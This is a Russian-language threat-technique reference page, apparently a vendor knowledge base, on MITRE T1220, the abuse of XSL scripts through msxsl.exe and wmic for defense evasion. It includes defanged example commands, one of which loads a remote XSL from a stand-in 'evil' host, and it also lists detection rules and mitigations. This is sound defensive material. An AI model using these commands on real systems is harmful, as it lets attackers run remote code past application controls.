T1220: Использование сценариев XSL
Злоумышленники могут обходить системы контроля приложений и скрывать выполнение кода, внедряя сценарии в XSL-файлы. Файлы XSL (Extensible Stylesheet Language) обычно используются для описания обработки и отображения данных в XML-файлах. Для поддержки сложных операций стандарт XSL поддерживает встроенные сценарии, написанные на различных языках программирования .
Злоумышленники могут злоупотреблять этой функциональностью для выполнения произвольных файлов в обход систем контроля приложений. Как и в случае выполнения через доверенные утилиты разработчика, для выполнения вредоносного JavaScript-кода, встроенного в локальные и удаленные (доступные по URL) XSL-файлы, злоумышленники могут устанавливать и использовать утилиту командной строки Microsoft для преобразования файлов (msxsl.exe) . Поскольку утилита msxsl.exe по умолчанию не установлена, злоумышленнику, вероятно, придется доставлять ее вместе с другими вредоносными файлами . Msxsl.exe принимает два основных аргумента: исходный XML-файл и XSL-таблицу стилей. Поскольку XSL-файл также является и корректным XML-файлом, злоумышленник может указать один и тот же XSL-файл оба раза. Msxsl.exe также позволяет злоумышленникам присваивать XML- и XSL-файлам произвольные расширения.
Примеры команд.
msxsl.exe customers[.]xml script[.]xsl
msxsl.exe script[.]xsl script[.]xsl
msxsl.exe script[.]jpeg script[.]jpeg
Другой вариант этой техники, который называется Squiblytwo, заключается в использовании инструментария управления Windows для запуска сценария на языке JScript или VBScript внутри XSL-файла. Эта техника, так же как и использование утилиты Regsvr32 (техника Squiblydoo), выполняет локальные или удаленные сценарии посредством доверенного встроенного инструмента Windows. Злоумышленники могут воспользоваться любым псевдонимом в инструментарии управления Windows при помощи параметра /FORMAT.
Примеры команд:
- для локального файла:
wmic process list /FORMAT:evil[.]xsl
- для удаленного файла:
wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”
Какие продукты Positive Technologies покрывают технику
Экспертиза MaxPatrol SIEM
mitre_attck_defense_evasion: PT-CR-208: XSL_Script_WMIC_Execution: Обнаружена попытка запустить сценарии XSL с помощью утилиты "wmic"
mitre_attck_defense_evasion: PT-CR-338: MSXSL_AWL_Bypass: Попытка обойти запрет на запуск приложений с помощью встроенной утилиты Microsoft Windows msxsl.exe (утилита командной строки для преобразования XSL)
Способы обнаружения
ID | DS0011 | Источник и компонент данных | Модуль: Загрузка модуля | Описание | Отслеживайте события, связанные с файлами DLL/PE, особенно события создания этих бинарных файлов, а также загрузки DLL в память процессов. Отслеживайте незнакомые DLL и те, которые обычно не загружаются в память процессов. |
---|
ID | DS0009 | Источник и компонент данных | Процесс: Создание процесса | Описание | Отслеживайте процессы для мониторинга запуска msxsl.exe и wmic.exe и их аргументов . Анализ аргументов командной строки, использованных до и после вызова сценария, позволит определить происхождение и назначение загружаемой полезной нагрузки. Присутствие msxsl.exe или других утилит для разработки, отладки и реверс-инжиниринга, через которые может выполняться произвольный код, в системах, не предназначенных для этих целей, должно рассматриваться как подозрительное. |
---|
Меры противодействия
ID | M1038 | Название | Защита от выполнения | Описание | Если msxsl.exe не нужен, заблокируйте его выполнение, чтобы предотвратить злоупотребления со стороны злоумышленников. |
---|